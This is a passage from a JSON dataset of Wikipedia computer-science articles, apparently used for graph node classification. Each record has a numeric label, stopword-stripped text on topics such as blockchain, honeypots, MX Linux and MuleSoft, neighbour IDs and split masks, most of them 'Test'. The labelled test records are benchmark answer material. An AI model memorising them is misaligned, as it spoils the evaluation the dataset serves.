gigawatts computing power — time consuming expensive also said within private blockchain also 'race incentive use power discover blocks faster competitors means many in-house blockchain solutions nothing cumbersome databases analysis public blockchains become increasingly important popularity bitcoin ethereum litecoin cryptocurrencies blockchain public provides anyone wants access observe analyse chain data given one know-how process understanding accessing flow crypto issue many cryptocurrencies crypto-exchanges banks reason accusations blockchain enabled cryptocurrencies enabling illicit dark market trade drugs weapons money laundering etc common belief cryptocurrency private untraceable thus leading many actors use illegal purposes changing specialised tech-companies provide blockchain tracking services making crypto exchanges law-enforcement banks aware happening crypto funds fiat crypto exchanges development argue led criminals prioritise use new cryptos monero question public accessibility blockchain data personal privacy data key debate cryptocurrency ultimately blockchain blockchain technology integrated multiple areas primary use blockchains today distributed ledger cryptocurrencies notably bitcoin operational products maturing proof concept late 2016 businesses thus far reluctant place blockchain core business structure cryptocurrencies use blockchain technology record transactions example bitcoin network ethereum network based blockchain 8 may 2018 facebook confirmed opening new blockchain group headed david marcus previously charge messenger according verge facebook planning launch cryptocurrency facilitating payments platform blockchain-based smart contracts proposed contracts could partially fully executed enforced without human interaction one main objectives smart contract automated escrow imf staff discussion reported smart contracts based blockchain technology might reduce moral hazards optimize use contracts general viable smart contract systems yet emerged due lack widespread use legal status unclear major portions financial industry implementing distributed ledgers use banking according september 2016 ibm study occurring faster expected banks interested technology potential speed back office settlement systems banks ubs opening new research labs dedicated blockchain technology order explore blockchain used financial services increase efficiency reduce costs berenberg german bank believes blockchain overhyped technology large number proofs concept still major challenges success stories blockchain game cryptokitties launched november 2017 game made headlines december 2017 cryptokitty character in-game virtual pet sold us 100,000 cryptokitties illustrated scalability problems games ethereum created significant congestion ethereum network 30 ethereum transactions game cryptokitties also demonstrated blockchains used catalog game assets digital assets specific token standards created support use blockchain gaming include erc-721 standard cryptokitties non-fungible tokens recent erc-1155 standard creation fungible e.g in-game currency non-fungible tokens e.g set rare armour blockchain use blockchain creation game assets provide advantages gamers include true ownership assets tied individual blockchain address rather accessed centralized game server transparency blockchain explorers used confirm total supply various game assets interoperability read decentralized public ledger blockchain assets open developers integrate game via blockchain choose number efforts industry organizations working employ blockchains supply chain logistics supply chain management blockchain transport alliance bita works develop open standards supply chains everledger one inaugural clients ibm blockchain-based tracking service walmart ibm running trial use blockchain-backed system supply chain monitoring — nodes blockchain administered walmart located ibm cloud hyperledger grid develops open components blockchain supply chain solutions blockchain technology used create permanent public transparent ledger system compiling data sales tracking digital use payments content creators wireless users musicians 2017 ibm partnered ascap prs music adopt blockchain technology music distribution imogen heap mycelia service also proposed blockchain-based alternative gives artists control songs associated data circulate among fans musicians new distribution methods available insurance industry peer-to-peer insurance parametric insurance microinsurance following adoption blockchain sharing economy iot also set benefit blockchains involve many collaborating peers online voting another application blockchain designs include currently least four types blockchain networks — public blockchains private blockchains consortium blockchains hybrid blockchains public blockchain absolutely access restrictions anyone internet connection send transactions well become validator i.e. participate execution consensus protocol usually networks offer economic incentives secure utilize type proof stake proof work algorithm largest known public blockchains bitcoin blockchain ethereum blockchain private blockchain permissioned one join unless invited network administrators participant validator access restricted hybrid blockchain simply explained combination different characteristics public private blockchains design allows users blockchain apis determine information stays private information made public decentralization relation primarily centralized private blockchains achieved various ways example instead keeping transactions inside network community run private nodes hash without payload posted completely decentralized blockchains bitcoin done automatically triggered thus providing historical transaction using signed hash allows users operate different blockchains selectively share data business logic blockchains like wanchain use interoperability mechanisms bridges submitting hash transaction without sensitive business logic public blockchains like bitcoin ethereum privacy blockchain concerns resolved personal identifiable information stored public blockchain depending hybrid blockchain architecture multicloud solutions allow store data compliance general data protection regulation geographical limitations also leveraging bitcoin global hashpower decentralize transactions october 2014 mit bitcoin club funding mit alumni provided undergraduate students massachusetts institute technology access 100 bitcoin adoption rates studied catalini tucker 2016 revealed people typically adopt technologies early given delayed access tend reject technology bank international settlements criticized public proof-of-work blockchains high energy consumption nicholas weaver international computer science institute university california berkeley examines blockchain online security energy efficiency proof-of-work public blockchains cases finds grossly inadequate september 2015 first peer-reviewed academic journal dedicated cryptocurrency blockchain technology research ledger announced inaugural issue published december 2016 journal covers aspects mathematics computer science engineering law economics philosophy relate cryptocurrencies bitcoin journal encourages authors digitally sign file hash submitted papers timestamped bitcoin blockchain authors also asked include personal bitcoin address first page papers non-repudiation purposes",
    "neighbors": [
      8706,
      8201,
      2068,
      1049,
      5658,
      10286,
      53,
      1087,
      9286,
      6728,
      10326,
      5210,
      4194,
      9828,
      1638,
      2669,
      119,
      1146,
      2689,
      3713,
      9859,
      10389,
      4263,
      1709,
      9901,
      2737,
      9397,
      4280,
      10938,
      4797,
      5830,
      8916,
      10452,
      4827,
      2780,
      10471,
      6383,
      7409,
      3323,
      764,
      8979,
      7446,
      5403,
      1315,
      2344,
      4392,
      3377,
      5433,
      10048,
      5953,
      2901,
      4956,
      11612,
      2418,
      9075,
      1908,
      4475,
      10632,
      3982,
      2456,
      11674,
      2975,
      9631,
      9634,
      11684,
      5029,
      7080,
      4011,
      7085,
      3508,
      3004,
      8640,
      987,
      479,
      4065,
      8674,
      6629,
      3052,
      6124,
      2544,
      10737,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9249,
    "label": 6,
    "text": "Professional_File_System:professional file system professional file system filesystem originally developed commercially amiga distributed aminet 4-clause bsd license compatible successor amifilesafe afs emphasis added reliability speed compared standard amiga filesystems also features multi-user abilities like older mufs device split two main areas beginning device metadata section consists root block generic array blocks allocated store metadata rest device another contiguous generic array blocks allocated store data metadata section usually uses percent device depending size device metadata stored tree single blocks metadata section entire directory structure recorded metadata data section purely contains data files metadata describes location data files extents blocks makes metadata quite compact metadata update occurs system looks block containing metadata changed copies newly allocated block metadata section change made recursively changes metadata block points block way way eventually root block needs changed causes atomic metadata update filesystem reasonably good keeping files unfragmented although defragmentation tool available work online filesystem first filesystem introduce concept recycle bin natively filesystem-level amiga holding last deleted files hidden directory disk root pfs version 5.3 developed c small portion assembly code michiel pelt",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      5709,
      6233,
      5729,
      4708,
      5736,
      11370,
      9836,
      7789,
      5743,
      9333,
      6263,
      9335,
      9848,
      9343,
      8832,
      7818,
      139,
      654,
      5264,
      2193,
      2194,
      2197,
      2199,
      11419,
      3233,
      6309,
      1190,
      5286,
      10405,
      7344,
      8369,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      1742,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      4387,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      11076,
      3909,
      2378,
      10570,
      4431,
      850,
      6995,
      346,
      2395,
      2397,
      10596,
      11123,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      8618,
      4012,
      1454,
      6062,
      432,
      11184,
      8114,
      7603,
      8115,
      1464,
      1978,
      6075,
      8643,
      4564,
      7126,
      1509,
      9189,
      11251,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 9250,
    "label": 4,
    "text": "National_Cyber_Range:national cyber range national cyber range project overseen darpa build scale model internet used carry cyber war games project serves test range military create antivirus technologies guard cyberterrorism attacks hackers several organisations involved development network including johns hopkins university baltimore lockheed martin 500m allocated department defense develop cyber technologies",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9251,
    "label": 5,
    "text": "Reliable_User_Datagram_Protocol:reliable user datagram protocol computer networking reliable user datagram protocol rudp transport layer protocol designed bell labs plan 9 operating system aims provide solution udp primitive guaranteed-order packet delivery desirable tcp adds much complexity/overhead order rudp gain higher quality service rudp implements features similar tcp less overhead order ensure quality extends udp means adding following features rudp currently formal standard however described ietf internet-draft 1999 proposed standardization cisco signalling link terminals either standalone integrated another gateway uses rudp backhauling ss7 mtp3 isdn signaling versions mutually incompatible differ slightly ietf draft structure cisco session manager used top rudp also different microsoft introduced another protocol named r-udp used mediaroom product owned ericsson iptv service delivery multicast networks proprietary protocol little known operation thought based referenced ietf draft",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5785,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      7983,
      562,
      2996,
      9909,
      4918,
      10171,
      4797,
      3133,
      3006,
      5181,
      5437,
      7364,
      11461,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      3564,
      367,
      8432,
      6651,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 9252,
    "label": 7,
    "text": "MuleSoft:mulesoft mulesoft llc software company headquartered san francisco california provides integration software connecting applications data devices started 2006 company anypoint platform integration products designed integrate software service saas on-premises software legacy systems company originally provided middleware messaging later expanded provide integration platform service ipaas approach companies main product anypoint platform mulesoft anypoint platform includes various components anypoint design center allows api developers design build apis anypoint exchange library api providers share apis templates assets anypoint management center centralized web interface analyze manage monitor apis integrations mulesoft also offers mule runtime engine runtime solution connecting enterprise applications on-premises cloud designed eliminate need custom point-to-point integration code may 2 2018 salesforce acquired mulesoft 6.5 billion cash stock deal ross mason dave rosenberg founded mulesource 2006 company changed name mulesoft 2009 april 2013 startup announced 37 million series e financing round led new enterprise associates participation new strategic investor salesforce.com existing investors hummer winblad venture partners morgenthaler ventures lightspeed venture partners sapphire ventures formerly sap ventures bay partners round brought mulesoft total financing course seven funding rounds 259 million april 2013 mulesoft acquired programmableweb website used developers help build web mobile connected applications apis 2016 mulesoft ranked 20 forbes cloud 100 list february 2017 company filed ipo began trading new york stock exchange march 17 2017 stock rose 45 first day trading march 2018 salesforce.com announced buying mulesoft deal reported worth us 6.5b may 2018 salesforce completed acquisition mulesoft mule name comes drudgery donkey work data integration platform created escape august 2019 mulesoft 1,400 employees 1,600 customers",
    "neighbors": [
      10090,
      9104,
      530,
      467,
      1363,
      8122,
      10236
    ],
    "mask": "Test"
  },
  {
    "node_id": 9253,
    "label": 3,
    "text": "MX_Linux:mx linux mx linux midweight linux operating system based debian stable using core antix components additional software created packaged mx community developed cooperative venture antix former mepis communities aiming use best tools talents distributions community stated goal combine elegant efficient desktop simple configuration high stability solid performance medium-sized footprint mx linux uses xfce desktop environment kde plasma environments added available spin-off iso images mx linux began discussion future options among members mepis community december 2013 developers antix joined bringing iso build system well live-usb/dvd technology order listed distrowatch mx linux initially presented version antix received distrowatch page separate distribution release first public beta mx-16 november 2 2016 mx-14 series based debian stable wheezy used first xfce 4.10 14.4 release xfce 4.12 mx-14 versions intended fit onto cd constraint limited applications could included series saw gradual evolution mx tools collection handy utilities designed help user variety common tasks often complicated obscure mx-15 moved new debian stable jessie using systemd-shim meaning systemd installed default init sysvinit size limitation lifted enabling developers present user full turnkey product substantial expansion mx tools occurred mx-16 still based debian stable jessie many applications backported added well sources also additions refinements mx tools import advanced antix developments expanded support completely new icon/theme/wallpaper combination mx-16.1 collected bug fixes improvements since mx-16 added new kingfisher theme upgraded streamlined mx tools revised documentation new translations mx-17 changes base debian 9 stretch brings upgraded artwork new mx tools improved live operation via antix many changes detailed mx blog mx-18 continues development mx tools introduces recent kernel enables whole disk encryption adds grub themes splash functionality mx boot options new artwork improved localization included details mx blog mx linux basic tools like installer handles uefi computers gui-based method change linux kernel core antix programs mx stands distros shipping suite user-oriented tools called mx tools many tools developed specifically mx forked existing antix apps existing antix apps couple imported permission outside sources example one interesting mx-snapshot gui tool remaster live installation single .iso file quickly conveniently cloned image bootable disk usb-thumbdrive maintaining settings way installation conveniently migrated distributed new hard-disk usb-thumbdrive requiring next administrative effort since advanced method copying file system developed antix-linux utilizing bind-mounts performs heavy lifting snapshot also serves essentially complete convenient backup installation",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      9902,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      3969,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 9254,
    "label": 3,
    "text": "Bubbler_(video_game):bubbler video game bubbler zx spectrum video game developed published ultimate play game 1987 ultimate final title 8-bit home computers evolving rare game isometric platform game style marble madness 1984 crash magazine reviewer ricky disliked impreciseness controls",
    "neighbors": [
      320,
      4102,
      9191,
      2792,
      9006,
      10931,
      4278,
      5820,
      2173
    ],
    "mask": "Test"
  },
  {
    "node_id": 9255,
    "label": 3,
    "text": "HSA_Foundation:hsa foundation hsa foundation not-for-profit engineering organization industry academia works development heterogeneous system architecture hsa set royalty-free computer hardware specifications well open source software development tools needed use hsa features application software hsa foundation aims develop define features interfaces various types computer processors including cpus graphics processors dsps well memory systems connect resulting architecture hsa aims make easier program parallel systems built heterogeneous combinations devices hsa foundation founded amd arm holdings imagination technologies mediatek qualcomm samsung texas instruments members include licensors licensees semiconductor intellectual property developers cpus gpus dsps application-specific integrated circuits asics based upon and/or licensed technology academic partners lawrence livermore national laboratory university bologna not-for-profit engineering organization linaro hsa foundation joined linux foundation hsa foundation engineering works upstream projects set requirements determined technical steering committee",
    "neighbors": [
      3586,
      10658,
      9863,
      4011,
      8237,
      1776,
      6705,
      2135,
      7645,
      415
    ],
    "mask": "Test"
  },
  {
    "node_id": 9256,
    "label": 4,
    "text": "Honeypot_(computing):honeypot computing computer terminology honeypot computer security mechanism set detect deflect manner counteract attempts unauthorized use information systems generally honeypot consists data example network site appears legitimate part site actually isolated monitored seems contain information resource value attackers blocked similar police sting operations colloquially known baiting suspect honeypots classified based deployment use/action based level involvement based deployment honeypots may classified production honeypots easy use capture limited information used primarily corporations production honeypots placed inside production network production servers organization improve overall state security normally production honeypots low-interaction honeypots easier deploy give less information attacks attackers research honeypots research honeypots run gather information motives tactics black hat community targeting different networks honeypots add direct value specific organization instead used research threats organizations face learn better protect threats research honeypots complex deploy maintain capture extensive information used primarily research military government organizations based design criteria honeypots classified pure honeypots full-fledged production systems activities attacker monitored using bug tap installed honeypot link network software needs installed even though pure honeypot useful stealthiness defense mechanisms ensured controlled mechanism high-interaction honeypots imitate activities production systems host variety services therefore attacker may allowed lot services waste time employing virtual machines multiple honeypots hosted single physical machine therefore even honeypot compromised restored quickly general high-interaction honeypots provide security difficult detect expensive maintain virtual machines available one physical computer must maintained honeypot exorbitantly expensive example honeynet low-interaction honeypots simulate services frequently requested attackers since consume relatively resources multiple virtual machines easily hosted one physical system virtual systems short response time less code required reducing complexity virtual system security example honeyd recently new market segment called deception technology emerged using basic honeypot technology addition advanced automation scale deception technology addresses automated deployment honeypot resources large commercial enterprise government institution malware honeypots used detect malware exploiting known replication attack vectors malware replication vectors usb flash drives easily verified evidence modifications either manual means utilizing special-purpose honeypots emulate drives malware increasingly used search steal cryptocurrencies spammers abuse vulnerable resources open mail relays open proxies servers accept e-mail anyone internet—including spammers—and send destination system administrators created honeypot programs masquerade abusable resources discover spammer activity several capabilities honeypots provide administrators existence fake abusable systems makes abuse difficult risky honeypots powerful countermeasure abuse rely high volume abuse e.g. spammers honeypots reveal abuser ip address provide bulk spam capture enables operators determine spammers urls response mechanisms described m. edwards itpro today apparent source may another abused system spammers abusers may use chain abused systems make detection original starting point abuse traffic difficult indicative power honeypots anti-spam tools early days anti-spam honeypots spammers little concern hiding location felt safe testing vulnerabilities sending spam directly systems honeypots made abuse riskier difficult spam still flows open relays volume much smaller 2001-02 spam originates u.s. spammers hop open relays across political boundaries mask origin honeypot operators may use intercepted relay tests recognize thwart attempts relay spam honeypots thwart may mean accept relay spam decline deliver honeypot operators may discover details concerning spam spammer examining captured spam messages open relay honeypots include jackpot written java jack cleaver smtpot.py written python karl a. krueger spamhole honeypot |spamhole written c. bubblegum proxypot open source honeypot proxypot email address used purpose receive spam also considered spam honeypot compared term spamtrap term honeypot might suitable systems techniques used detect counterattack probes spamtrap spam arrives destination legitimately —exactly non-spam email would arrive amalgam techniques project honey pot distributed open source project uses honeypot pages installed websites around world honeypot pages disseminate uniquely tagged spamtrap email addresses spammers tracked—the corresponding spam mail subsequently sent spamtrap e-mail addresses databases often get attacked intruders using sql injection activities recognized basic firewalls companies often use database firewalls protection available sql database firewalls provide/support honeypot architectures intruder runs trap database web application remains functional honeypots weapons spammers honeypot detection systems spammer-employed counter-weapons detection systems would likely use unique characteristics specific honeypots identify many honeypots in-use utilise set unique characteristics larger daunting seeking detect thereby identify unusual circumstance software situation versionitis large number versions software differing slightly beneficial also advantage easy-to-detect honeypots deployed fred cohen inventor deception toolkit argues every system running honeypot deception port adversaries use detect honeypot cohen believes might deter adversaries two honeypots network form honey net typically honey net used monitoring larger and/or diverse network one honeypot may sufficient honey nets honeypots usually implemented parts larger network intrusion detection systems honey farm centralized collection honeypots analysis tools concept honey net first began 1999 lance spitzner founder honeynet project published paper build honeypot metaphor bear attracted stealing honey common many traditions including germanic celtic slavic common slavic word bear medved honey eater tradition bears stealing honey passed stories folklore especially well known winnie pooh brazilian folk tale boneca de pixe tells stealing monkey trapped puppet made pitch earliest honeypot techniques described clifford stoll 1989 book cuckoo egg 2017 dutch police used honeypot techniques track users darknet market hansa",
    "neighbors": [
      3072,
      10756,
      10245,
      1544,
      9227,
      9233,
      9242,
      8224,
      9761,
      9771,
      5677,
      7222,
      10297,
      3643,
      7739,
      9791,
      1088,
      4165,
      9824,
      6762,
      107,
      7798,
      5245,
      4734,
      6786,
      5764,
      9356,
      4245,
      10392,
      1690,
      5281,
      2213,
      8387,
      11461,
      3786,
      4314,
      9950,
      11502,
      4344,
      3320,
      4863,
      1279,
      2305,
      3845,
      7441,
      8978,
      4883,
      2324,
      278,
      3867,
      8998,
      300,
      1843,
      7482,
      3395,
      7515,
      3941,
      11621,
      8554,
      877,
      9591,
      899,
      7044,
      9102,
      10132,
      4503,
      923,
      10141,
      9630,
      931,
      939,
      1970,
      4023,
      8632,
      8635,
      6588,
      2508,
      5591,
      3032,
      9187,
      4585,
      10232,
      2041,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9257,
    "label": 2,
    "text": "Samizdat:_And_Other_Issues_Regarding_the_'Source'_of_Open_Source_Code:samizdat issues regarding 'source open source code samizdat issues regarding 'source open source code 2004 report kenneth brown report suggests linux kernel may created distributed illegally open-source software may generally subject abuses report states linux kernel written using copied source code minix resources acquired improperly possibly illegally linus torvalds also suggests one never certain origins open source code similar misuse copyrighted code may exist open-source projects finally asserts gnu general public license bad economy book greeted widespread rejection technical world repudiated many claimed sources prerelease long delisted distributor site book never given proper release although prerelease pdf available online title reference samizdat form private circulation suppressed literature within soviet-bloc countries extension slang papers contain programming techniques code sometimes sources authorized publication often passed programmer programmer samizdat claims linus torvalds used source code taken minix small unix-like operating system used teaching computer science create linux 0.01 theory mere student could write entire unix-like kernel single-handedly book also recommends government-funded programming never licensed gpl bsd license similar simple permissive licenses states us government book claims methodology references seriously questioned including many quotes support thesis andrew s. tanenbaum author minix dennis ritchie one creators unix richard stallman leader gnu project others said quotes attributed interview adti fact prerelease journal papers ilkka tuomi messageboard posts charles mills henry jones alexey toptygin said commissioned brown find similarities minix linux 0.01 source code found support theory minix source code used create linux study mentioned book toptygin quoted saying asked friend ... wanted code analysis consultancy basis boss kenneth brown ended 10 hours work comparing early versions linux minix looking copied code summarize analysis found evidence whatsoever code copied called ask questions analysis methods results ask would like repeated source comparison tools bit shock apparently ken expecting find gobs copied source code spent conversation trying convince must made mistake since clearly impossible one person write os 'code theft occurred although linux 0.01 written using minix example starting point — minix created tanenbaum example study — code minix actually used tanenbaum agrees point stated much interview ken brown latter researching samizdat furthermore linux 0.01 barely functional first draft far sophisticated industry-grade linux-based operating systems would later grow samizdat detractors also point fact adti funded directly since 1999 microsoft company publishes competing proprietary operating system microsoft windows considers linux one important competitors see halloween documents documents ii month widespread rejection book technical press microsoft also repudiated mid-june spokesman calling “ unhelpful distraction matters most—providing best technology customers. ” notably absent brown research samizdat direct communication torvalds",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      4493,
      6797,
      2195,
      11155,
      1813,
      5397,
      10780,
      1694,
      3618,
      4011,
      9646,
      7983,
      823,
      9660,
      10817,
      5067,
      6352,
      8147,
      1761,
      4841,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 9258,
    "label": 2,
    "text": "HP_Universal_Print_Driver:hp universal print driver hp universal print driver upd intelligent print driver supports broad range hp laserjet printers mfps developed hewlett-packard combines general purpose driver unidrv pscript hp proprietary extensions hp upd simplifies driver deployment management advanced print driver ability discover hp printing devices automatically configure device capabilities e.g. duplex color finishing etc. hp universal print driver microsoft windows solution provides two modes operation traditional dynamic traditional mode hp upd behaves similarly traditional print drivers dynamic mode provides discovery auto configuration management features particularly well suited mobile computer users hp ’ universal print driver based microsoft ’ universal core drivers unidrv pscript core drivers usable device specific information used inform core driver actual device settings capabilities accomplish task universal printing dialog box inserted standard print setup dialog box universal printing dialog box allows users choose recently used device enter device ip address search local print devices choose device predefined list regardless device discovery method used microsoft core driver updated accordingly new device information reflected normal print driver user interface hp provides three different universal print drivers pcl5 pcl6 emulation postscript custom default values assigned hp driver configuration utility hp upd available microsoft windows 32-bit 64-bit driver automatically configures one 35 currently supported languages based upon language host system dynamic mode searching devices accomplished using mdns discovery protocol aka bonjour mdns protocol performs satisfactorily devices residing subnet users need enter ip addresses remote devices unless previously discovered available managed printers list whether discovered entered chosen hp universal printing dialog box submits snmp requests target device ’ ip address using enterprise auto configuration eac bidirectional communications port snmp requests ascertain device ’ configurations capabilities results used hp upd update print driver table windows registry accurately reflect target device ’ capabilities results also cached creg recently discovered device list updated provide easy method future selection dynamic mode hp upd considered virtual device therefore new device instances appear printers folder traditional mode hp upd bound print queue behaves like normal printer driver addition bi-directional communications device queries real time print job status mode chosen driver installation dynamic mode universal printing dialog box traditional mode bypasses universal printing dialog box goes directly typical print setup dialog box automatic configuration occur traditional mode users select manual updates ensure device ’ capabilities properly represented hp upd installed either dynamic mode traditional mode depending user requirements hp upd includes driver management features allowing administrators pre-configure deploy manage hp driver software management tools within hp upd include install.exe command line options hp mpa tool active directory templates driver configuration utility driver deployment utility hp web jetadmin install.exe hp upd installer allows driver default settings modified via command line options switches change system-wide behavior hp upd changes specific single print queue hp mpa utility hp mpa utility pre-configures driver default settings managed hp upd environment settings made within hp mpa utility control hp upd user level resulting policies maintained every printer attached hp upd global user policies affect hp upd users hp upd active directory templates hp upd administrative template active directory template added create group policy object manage user upd capabilities settings apply queue uses hp upd care taken locking configuration settings user unable change locked setting hp driver configuration utility hp driver configuration utility dcu windows application used edit configuration file associated particular driver configuration file controls print driver settings takes effect driver installed hp driver deployment utility ddu used pre-configure print driver deployment package run client computer new configuration file configures printer driver installed interfere whql certification ddu contains standalone dcu utility inside package launched pre-configure driver selected ddu tool beyond driver configuration hp upd also employs managed printer lists mpls managed print policies mpp control access devices capabilities technologies used hp upd dynamic mode mpls used searching devices unnecessary users presented predefined list devices choose mpls xml files created manually hp mpa utility exported hp web jetadmin hp upd activated begins searching network mpl file shown figure 6 mpps used control users access device features like color duplex etc default hp upd assumes hp mpa installed server named managed-print result hp upd searches network server find hp managed print policies hp managed printer lists driver also includes status notification pop-ups print submission inform user device status print job status consumable levels graphical popup window displays dashboard toner supply levels links reordering consumables instant support landing page particular hp device model hp upd selected printing attempt communicate directly printer gather status job information printing querying printer snmp get commands network traffic kept minimum present printing desired snps disabled",
    "neighbors": [
      3974,
      5384,
      4457,
      6797,
      8628,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 9259,
    "label": 4,
    "text": "NetScout_Systems:netscout systems netscout systems inc. provider application network performance management products headquartered westford massachusetts netscout serves enterprises community government agencies telecommunications service providers july 2015 netscout acquired communications business danaher corporation including arbor networks fluke networks tektronix communications vss monitoring netscout subsidiaries cayman islands tax netscout systems acquired network general 2007 network general developed original network packet sniffer 1986 merged mcafee associates 1997 form network associates mid-2004 network associates sold sniffer technologies business silver lake partners texas pacific group 275 million cash form network general early 2006 network general acquired fidelia technology adding netvigil business service monitoring technology network application performance analysis tools september 2007 network general agreed acquired netscout systems 205 million netscout systems founded anil singhal narendra popat frontier software 1984 netscout created first rmon based ethernet probe 1992 november 2007 netscout acquired sniffer infinistream network intelligence product lines network general netscout merged product lines allow performance manager product use probes infinistream technologies april 2011 netscout acquired voice video management company psytechnics ipswich u.k acquired fox replay privately held dutch company 2011 later year many years partnering complementing solutions network switch port aggregation netscout moved directly competition partners acquiring privately held simena networks october 2014 netscout systems announced entered definitive agreement acquire communications business science technology company danaher corporation 2.6 billion upon completion merger danaher shareholders would nearly 59.5 percent combined company netscout shareholders would remaining stake analyst firm 451 research technology-industry syndicated research data firm predicted may 2015 acquisition netscout largest company network visibility management space 3,000 employees well 1bn year revenue july 2015 netscout finalized acquisition communications business danaher corporation including arbor networks security systems fluke networks rf wi-fi network troubleshooting analytics tektronix communications traffic inspection customer experience management analytics vss monitoring network packet brokers prepared statement company noted acquisition accelerates netscout ’ strategic progress enabling company offer ... innovative service assurance cyber security solutions adds new employees netscout",
    "neighbors": [
      9440,
      793,
      679
    ],
    "mask": "Test"
  },
  {
    "node_id": 9260,
    "label": 4,
    "text": "National_Privacy_Commission_(Philippines):national privacy commission philippines national privacy commission npc independent body created republic act 10173 data privacy act 2012 mandated administer implement provisions act monitor ensure compliance country international standards set data protection attached philippines department information communications technology dict purposes policy coordination remains independent performance functions commission safeguards fundamental human right every individual privacy particularly information privacy ensuring free flow information innovation growth national development order fulfill mandate commission vested broad range powers receiving complaints instituting investigations matters affecting personal data protection compelling entities abide orders matters affecting data privacy also represents philippine government internationally data protection related issues commission formulates implements policies relating protection personal data including relevant circulars advisory guidelines assist organisations understanding complying data privacy act commission also reviews organizational actions relation data protection rules issue decisions directions compliance necessary mandated work relevant sector regulators exercising functions beyond regulating data protection issues npc also undertakes public sector-specific educational outreach activities help organizations adopt good data protection practices help individuals better understand may protect personal data misuse data privacy act 2012 first law philippines acknowledges rights individuals personal data enforcing responsibilities entities process initial definition offered first republic act 8792 section 32 better known ecommerce act philippines formally introduced department trade industry dti department administrative order 08 defining guidelines protection personal data information private sector along anti-cybercrime bill ra 10175 first draft law started 2001 legal regulatory committee former information technology ecommerce council itecc forerunner commission information communication technology cict headed former secretary virgilio ver peña committee chaired atty claro parlade initiative information security privacy sub-committee chaired albert dela cruz president phcert together anti-computer crime fraud division chief atty elfren meneses nbi administrative operational functions provided presidential management staff pms acting cict secretariat rising concerns information technology business process association philippines ibpap absence data privacy law philippine congress passed senate bill 2965 house bill 4115 june 6 2012 president benigno s. aquino iii signed republic act 10173 data privacy act 2012 august 15 2012 law influenced data protection directive apec privacy framework president aquino appointed march 7 2016 raymund liboro inaugural head commission damian domingo o. mapa ivy d. patdu inaugural deputy privacy commissioners fixed terms office continued roles administration president rodrigo duterte consultation various private organizations civil societies series public hearings manila cebu davao implementing rules regulations data privacy act signed august 24 2016 took effect september 9 2016 may 2016 commission formally investigated commission elections commission elections data breach one largest security breach government held personal data february 21 2017 npc announced commission elections investigated another security breach due alleged theft computer containing personal data voters npc also began coordinating different sectors privacy data protection 2016 national privacy commission accepted member international conference data protection privacy commissioners asia pacific privacy authorities",
    "neighbors": [
      2818,
      3880,
      1930,
      9901,
      3599,
      1169,
      3858,
      10002,
      6455,
      1368
    ],
    "mask": "Test"
  },
  {
    "node_id": 9261,
    "label": 7,
    "text": "Ultimate_Software:ultimate software ultimate software american technology company develops sells ultipro cloud-based human capital management hcm software system businesses headquartered weston florida company founded 1990 current president ceo scott scherr released first version software 1993 fourth quarter 2017 ultimate software reported total revenues 940.7 million 2017 company employs 4,200 people services 4,100 customers 160 countries ultimate offices around usa canada uk singapore february 4 2019 hellman friedman capital partners announced would purchase ultimate software group 11 billion purchase closed may 3 2019 ultimate software founded scott scherr company ’ current ceo president 1990 1993 tech company released ultipro hrms/ payroll sold on-premises software servicing core hr payroll company went public nasdaq ulti june 1998 2002 ultipro reintroduced cloud-based software-as-a-service saas provide unified management tool human resources model allowed company hold 33 million client records cloud service 3,400 customers according career builder company announced expanding outside united states opened office london england later year ultimate announced additional expansions singapore company ultipro cloud-based platform delivers human capital management organizations across industries ultipro provides one system record hr payroll talent management according trustradius ultipro includes time attendance employee onboarding performance management compensation management succession management recruiting features like predictive analytics ultipro sold via saas model per-employee-per-month subscription according center generational kinetics center partnered company 2014 conduct research multiple generations workforce research looked work expectations across different generations focus millennials study explored millennials differ prior generations way feel applying job interviewing receiving feedback leaving job 2016 center generational kinetics continued partnership examine drivers motivators behind people workforce study focused organizations understand improve employee experience 2017 fortune magazine 